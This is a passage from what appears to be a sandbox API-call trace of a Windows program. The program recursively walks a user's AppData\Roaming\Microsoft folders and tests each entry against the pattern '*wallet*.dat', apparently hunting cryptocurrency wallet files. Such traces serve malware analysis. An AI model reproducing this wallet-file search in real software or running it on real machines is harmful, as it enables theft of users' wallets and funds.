nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Low", cAlternateFileName="")) returned 1 [0234.719] StrCmpCA (pszStr1="Low", pszStr2=".") returned 30 [0234.719] StrCmpCA (pszStr1="Low", pszStr2="..") returned 30 [0234.720] wsprintfA (in: param_1=0x196ebc, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low") returned 78 [0234.720] StrCmpCA (pszStr1="Microsoft\\Internet Explorer\\UserData", pszStr2="") returned 77 [0234.720] wsprintfA (in: param_1=0x196fc4, param_2="%s\\%s" | out: param_1="Microsoft\\Internet Explorer\\UserData\\Low") returned 40 [0234.720] PathMatchSpecA (pszFile="Low", pszSpec="*wallet*.dat") returned 0 [0234.720] wsprintfA (in: param_1=0x196b8c, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\*") returned 80 [0234.720] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\*", lpFindFileData=0x196a44 | out: lpFindFileData=0x196a44*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x42ce6642, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42ce6642, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42ce6642, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3, dwReserved1=0x6b0260, cFileName=".", cAlternateFileName="")) returned 0x6e19a0 [0234.720] StrCmpCA (pszStr1=".", pszStr2=".") returned 0 [0234.720] FindNextFileA (in: hFindFile=0x6e19a0, lpFindFileData=0x196a44 | out: lpFindFileData=0x196a44*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x42ce6642, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42ce6642, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42ce6642, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3, dwReserved1=0x6b0260, cFileName="..", cAlternateFileName="")) returned 1 [0234.720] StrCmpCA (pszStr1="..", pszStr2=".") returned 46 [0234.720] StrCmpCA (pszStr1="..", pszStr2="..") returned 0 [0234.720] FindNextFileA (in: hFindFile=0x6e19a0, lpFindFileData=0x196a44 | out: lpFindFileData=0x196a44*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x42ce6642, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42ce6642, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42ce6642, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3, dwReserved1=0x6b0260, cFileName="..", cAlternateFileName="")) returned 0 [0234.720] FindClose (in: hFindFile=0x6e19a0 | out: hFindFile=0x6e19a0) returned 1 [0234.721] FindNextFileA (in: hFindFile=0x6e17a0, lpFindFileData=0x1970cc | out: lpFindFileData=0x1970cc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x42ce6642, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42ce6642, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42ce6642, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Low", cAlternateFileName="")) returned 0 [0234.721] FindClose (in: hFindFile=0x6e17a0 | out: hFindFile=0x6e17a0) returned 1 [0234.721] FindNextFileA (in: hFindFile=0x6e18e0, lpFindFileData=0x197754 | out: lpFindFileData=0x197754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42ce6642, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42ce6642, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42ce6642, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x14e, dwReserved1=0x0, cFileName="UserData", cAlternateFileName="")) returned 0 [0234.721] FindClose (in: hFindFile=0x6e18e0 | out: hFindFile=0x6e18e0) returned 1 [0234.721] FindNextFileA (in: hFindFile=0x6e1660, lpFindFileData=0x197ddc | out: lpFindFileData=0x197ddc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3704a98f, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x3704a98f, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x3704a98f, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x14e, cFileName="MMC", cAlternateFileName="")) returned 1 [0234.721] StrCmpCA (pszStr1="MMC", pszStr2=".") returned 31 [0234.721] StrCmpCA (pszStr1="MMC", pszStr2="..") returned 31 [0234.721] wsprintfA (in: param_1=0x197bcc, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\MMC") returned 51 [0234.721] StrCmpCA (pszStr1="Microsoft", pszStr2="") returned 77 [0234.721] wsprintfA (in: param_1=0x197cd4, param_2="%s\\%s" | out: param_1="Microsoft\\MMC") returned 13 [0234.721] PathMatchSpecA (pszFile="MMC", pszSpec="*wallet*.dat") returned 0 [0234.721] wsprintfA (in: param_1=0x19789c, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\MMC\\*") returned 53 [0234.721] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\MMC\\*", lpFindFileData=0x197754 | out: lpFindFileData=0x197754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3704a98f, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x3704a98f, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x3704a98f, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6e1d20 [0234.723] StrCmpCA (pszStr1=".", pszStr2=".") returned 0 [0234.723] FindNextFileA (in: hFindFile=0x6e1d20, lpFindFileData=0x197754 | out: lpFindFileData=0x197754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3704a98f, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x3704a98f, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x3704a98f, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0234.723] StrCmpCA (pszStr1="..", pszStr2=".") returned 46 [0234.723] StrCmpCA (pszStr1="..", pszStr2="..") returned 0 [0234.723] FindNextFileA (in: hFindFile=0x6e1d20, lpFindFileData=0x197754 | out: lpFindFileData=0x197754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3704a98f, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x3704a98f, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x3704a98f, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0234.723] FindClose (in: hFindFile=0x6e1d20 | out: hFindFile=0x6e1d20) returned 1 [0234.723] FindNextFileA (in: hFindFile=0x6e1660, lpFindFileData=0x197ddc | out: lpFindFileData=0x197ddc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f3fb46a, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6f3fb46a, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6f3fb46a, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Network", cAlternateFileName="")) returned 1 [0234.723] StrCmpCA (pszStr1="Network", pszStr2=".") returned 32 [0234.723] StrCmpCA (pszStr1="Network", pszStr2="..") returned 32 [0234.723] wsprintfA (in: param_1=0x197bcc, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Network") returned 55 [0234.724] StrCmpCA (pszStr1="Microsoft", pszStr2="") returned 77 [0234.724] wsprintfA (in: param_1=0x197cd4, param_2="%s\\%s" | out: param_1="Microsoft\\Network") returned 17 [0234.724] PathMatchSpecA (pszFile="Network", pszSpec="*wallet*.dat") returned 0 [0234.724] wsprintfA (in: param_1=0x19789c, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Network\\*") returned 57 [0234.724] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Network\\*", lpFindFileData=0x197754 | out: lpFindFileData=0x197754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f3fb46a, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6f3fb46a, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6f3fb46a, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6e1ca0 [0234.725] StrCmpCA (pszStr1=".", pszStr2=".") returned 0 [0234.725] FindNextFileA (in: hFindFile=0x6e1ca0, lpFindFileData=0x197754 | out: lpFindFileData=0x197754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f3fb46a, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6f3fb46a, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6f3fb46a, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0234.725] StrCmpCA (pszStr1="..", pszStr2=".") returned 46 [0234.725] StrCmpCA (pszStr1="..", pszStr2="..") returned 0 [0234.725] FindNextFileA (in: hFindFile=0x6e1ca0, lpFindFileData=0x197754 | out: lpFindFileData=0x197754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f3fb46a, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6f3fb46a, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6f3fb46a, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Connections", cAlternateFileName="CONNEC~1")) returned 1 [0234.725] StrCmpCA (pszStr1="Connections", pszStr2=".") returned 21 [0234.726] StrCmpCA (pszStr1="Connections", pszStr2="..") returned 21 [0234.726] wsprintfA (in: param_1=0x197544, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Network\\Connections") returned 67 [0234.726] StrCmpCA (pszStr1="Microsoft\\Network", pszStr2="") returned 77 [0234.726] wsprintfA (in: param_1=0x19764c, param_2="%s\\%s" | out: param_1="Microsoft\\Network\\Connections") returned 29 [0234.726] PathMatchSpecA (pszFile="Connections", pszSpec="*wallet*.dat") returned 0 [0234.726] wsprintfA (in: param_1=0x197214, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Network\\Connections\\*") returned 69 [0234.726] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Network\\Connections\\*", lpFindFileData=0x1970cc | out: lpFindFileData=0x1970cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f3fb46a, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6f3fb46a, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6f3fb46a, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName=".", cAlternateFileName="")) returned 0x6e1920 [0234.726] StrCmpCA (pszStr1=".", pszStr2=".") returned 0 [0234.726] FindNextFileA (in: hFindFile=0x6e1920, lpFindFileData=0x1970cc | out: lpFindFileData=0x1970cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f3fb46a, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6f3fb46a, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6f3fb46a, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="..", cAlternateFileName="")) returned 1 [0234.727] StrCmpCA (pszStr1="..", pszStr2=".") returned 46 [0234.727] StrCmpCA (pszStr1="..", pszStr2="..") returned 0 [0234.727] FindNextFileA (in: hFindFile=0x6e1920, lpFindFileData=0x1970cc | out: lpFindFileData=0x1970cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f3fb46a, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6f3fb46a, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6f3fb46a, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="Pbk", cAlternateFileName="")) returned 1 [0234.727] wsprintfA (in: param_1=0x196ebc, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk") returned 71 [0234.727] wsprintfA (in: param_1=0x196fc4, param_2="%s\\%s" | out: param_1="Microsoft\\Network\\Connections\\Pbk") returned 33 [0234.727] PathMatchSpecA (pszFile="Pbk", pszSpec="*wallet*.dat") returned 0 [0234.727] wsprintfA (in: param_1=0x196b8c, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\*") returned 73 [0234.727] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\*", lpFindFileData=0x196a44 | out: lpFindFileData=0x196a44*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f3fb46a, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6f3fb46a, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6f3fb46a, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5, dwReserved1=0x6b0260, cFileName=".", cAlternateFileName="")) returned 0x6e1be0 [0234.728] FindNextFileA (in: hFindFile=0x6e1be0, lpFindFileData=0x196a44 | out: lpFindFileData=0x196a44*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f3fb46a, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6f3fb46a, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6f3fb46a, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5, dwReserved1=0x6b0260, cFileName="..", cAlternateFileName="")) returned 1 [0234.728] FindNextFileA (in: hFindFile=0x6e1be0, lpFindFileData=0x196a44 | out: lpFindFileData=0x196a44*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f3fb46a, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6f3fb46a, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6f3fb46a, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5, dwReserved1=0x6b0260, cFileName="_hiddenPbk", cAlternateFileName="_HIDDE~1")) returned 1 [0234.728] wsprintfA (in: param_1=0x196834, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk") returned 82 [0234.728] wsprintfA (in: param_1=0x19693c, param_2="%s\\%s" | out: param_1="Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk") returned 44 [0234.728] PathMatchSpecA (pszFile="_hiddenPbk", pszSpec="*wallet*.dat") returned 0 [0234.728] wsprintfA (in: param_1=0x196504, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\*") returned 84 [0234.728] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\*", lpFindFileData=0x1963bc | out: lpFindFileData=0x1963bc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f3fb46a, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6f3fb46a, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6f3fb46a, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName=".", cAlternateFileName="")) returned 0x6e1da0 [0234.728] FindNextFileA (in: hFindFile=0x6e1da0, lpFindFileData=0x1963bc | out: lpFindFileData=0x1963bc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f3fb46a, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6f3fb46a, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6f3fb46a, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="..", cAlternateFileName="")) returned 1 [0234.729] FindNextFileA (in: hFindFile=0x6e1da0, lpFindFileData=0x1963bc | out: lpFindFileData=0x1963bc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f3fb46a, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6f3fb46a, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6f3fb46a, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="rasphone.pbk", cAlternateFileName="")) returned 1 [0234.729] wsprintfA (in: param_1=0x1961ac, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\rasphone.pbk") returned 95 [0234.729] wsprintfA (in: param_1=0x1962b4, param_2="%s\\%s" | out: param_1="Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\rasphone.pbk") returned 57 [0234.729] PathMatchSpecA (pszFile="rasphone.pbk", pszSpec="*wallet*.dat") returned 0 [0234.729] wsprintfA (in: param_1=0x195e7c, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\rasphone.pbk\\*") returned 97 [0234.729] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\rasphone.pbk\\*", lpFindFileData=0x195d34 | out: lpFindFileData=0x195d34*(dwFileAttributes=0x6f3fb46a, ftCreationTime.dwLowDateTime=0x1d7006c, ftCreationTime.dwHighDateTime=0x6f3fb46a, ftLastAccessTime.dwLowDateTime=0x1d7006c, ftLastAccessTime.dwHighDateTime=0x6f3fb46a, ftLastWriteTime.dwLowDateTime=0x1d7006c, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x207d0, dwReserved0=0x20000, dwReserved1=0x610072, cFileName="s", cAlternateFileName="C")) returned 0xffffffff [0234.729] FindNextFileA (in: hFindFile=0x6e1da0, lpFindFileData=0x1963bc | out: lpFindFileData=0x1963bc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f3fb46a, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6f3fb46a, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6f3fb46a, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="rasphone.pbk", cAlternateFileName="")) returned 0 [0234.729] FindClose (in: hFindFile=0x6e1da0 | out: hFindFile=0x6e1da0) returned 1 [0234.729] FindNextFileA (in: hFindFile=0x6e1be0, lpFindFileData=0x196a44 | out: lpFindFileData=0x196a44*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f3fb46a, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6f3fb46a, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6f3fb46a, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5, dwReserved1=0x6b0260, cFileName="_hiddenPbk", cAlternateFileName="_HIDDE~1")) returned 0 [0234.729] FindClose (in: hFindFile=0x6e1be0 | out: hFindFile=0x6e1be0) returned 1 [0234.730] FindNextFileA (in: hFindFile=0x6e1920, lpFindFileData=0x1970cc | out: lpFindFileData=0x1970cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f3fb46a, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6f3fb46a, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6f3fb46a, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="Pbk", cAlternateFileName="")) returned 0 [0234.730] FindClose (in: hFindFile=0x6e1920 | out: hFindFile=0x6e1920) returned 1 [0234.730] FindNextFileA (in: hFindFile=0x6e1ca0, lpFindFileData=0x197754 | out: lpFindFileData=0x197754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f3fb46a, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6f3fb46a, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6f3fb46a, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Connections", cAlternateFileName="CONNEC~1")) returned 0 [0234.730] FindClose (in: hFindFile=0x6e1ca0 | out: hFindFile=0x6e1ca0) returned 1 [0234.730] FindNextFileA (in: hFindFile=0x6e1660, lpFindFileData=0x197ddc | out: lpFindFileData=0x197ddc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80f7a98f, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xa45e20df, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xa45e20df, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Office", cAlternateFileName="")) returned 1 [0234.730] wsprintfA (in: param_1=0x197bcc, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Office") returned 54 [0234.730] wsprintfA (in: param_1=0x197cd4, param_2="%s\\%s" | out: param_1="Microsoft\\Office") returned 16 [0234.730] PathMatchSpecA (pszFile="Office", pszSpec="*wallet*.dat") returned 0 [0234.730] wsprintfA (in: param_1=0x19789c, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Office\\*") returned 56 [0234.730] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Office\\*", lpFindFileData=0x197754 | out: lpFindFileData=0x197754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80f7a98f, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xa45e20df, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xa45e20df, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x207d0, cFileName=".", cAlternateFileName="")) returned 0x6e1ce0 [0234.732] FindNextFileA (in: hFindFile=0x6e1ce0, lpFindFileData=0x197754 | out: lpFindFileData=0x197754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80f7a98f, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xa45e20df, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xa45e20df, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x207d0, cFileName="..", cAlternateFileName="")) returned 1 [0234.732] FindNextFileA (in: hFindFile=0x6e1ce0, lpFindFileData=0x197754 | out: lpFindFileData=0x197754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80f81d62, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80f81d62, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x80f83167, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x9362, dwReserved0=0x0, dwReserved1=0x207d0, cFileName="MSO1033.acl", cAlternateFileName="")) returned 1 [0234.732] wsprintfA (in: param_1=0x197544, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Office\\MSO1033.acl") returned 66 [0234.732] wsprintfA (in: param_1=0x19764c, param_2="%s\\%s" | out: param_1="Microsoft\\Office\\MSO1033.acl") returned 28 [0234.732] PathMatchSpecA (pszFile="MSO1033.acl", pszSpec="*wallet*.dat") returned 0 [0234.732] wsprintfA (in: param_1=0x197214, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Office\\MSO1033.acl\\*") returned 68 [0234.732] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Office\\MSO1033.acl\\*", lpFindFileData=0x1970cc | out: lpFindFileData=0x1970cc*(dwFileAttributes=0x80f81d62, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x80f81d62, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0x80f83167, ftLastWriteTime.dwLowDateTime=0x1d705ee, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x9362, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x53004d, cFileName="O", cAlternateFileName="")) returned 0xffffffff [0234.732] FindNextFileA (in: hFindFile=0x6e1ce0, lpFindFileData=0x197754 | out: lpFindFileData=0x197754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa45e20df, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xa4689310, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xa4689310, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x207d0, cFileName="Recent", cAlternateFileName="")) returned 1 